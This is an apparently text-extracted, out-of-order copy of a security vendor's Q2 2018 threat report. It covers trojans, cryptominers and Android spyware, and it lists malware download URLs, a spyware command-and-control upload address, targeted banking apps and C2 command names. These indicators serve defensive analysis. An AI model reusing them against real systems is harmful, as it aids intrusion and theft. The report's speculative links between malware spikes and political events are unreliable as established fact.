First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 10 of 73
The purpose of the VBScript is to launch PowerShell
Global Threat Report Q2 2018 Edition
Page 11 of 73
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of the writing only thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb)
The binary moves itself to CWindowsSysWOW64lanesviewerexe and creates a service ldquolanesviewerrdquo to ensure persistence
The malware creates ldquolanesviewerrdquo service to ensure persistence
Global Threat Report Q2 2018 Edition
Page 12 of 73
And after that Emotet begins it real mission ndash stealing private data from the compromised system which it then it sends to the cybercriminals Command amp Control server
The next example is even more cunning because it infects computers with popular legitimate Microsoft software
23 Flawed Ammyy RAT attack based on legitimate software Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks What is most impressive is that it is based on a legitimate software called Ammyy Admin Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company It provides an easy way to establish a reliable remote desktop connection connecting remote computers within seconds without additional installation or configuration work
The dark side of this tool is that its features ideally suit the purposes of cybercriminal Unsurprisingly perpetrators tried to adopt it for their malicious activity Cybercriminals repeatedly compromised the Ammyyy Group website and replaced original Ammyy Admin software with a bundle containing malware Thus every user who downloaded Ammyy Admin became covertly infected Ammy Group cleaned up the compromised website but the attackers infected it again and this vicious сycle continued endlessly
Global Threat Report Q2 2018 Edition
Page 13 of 73
As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware
The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc
The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
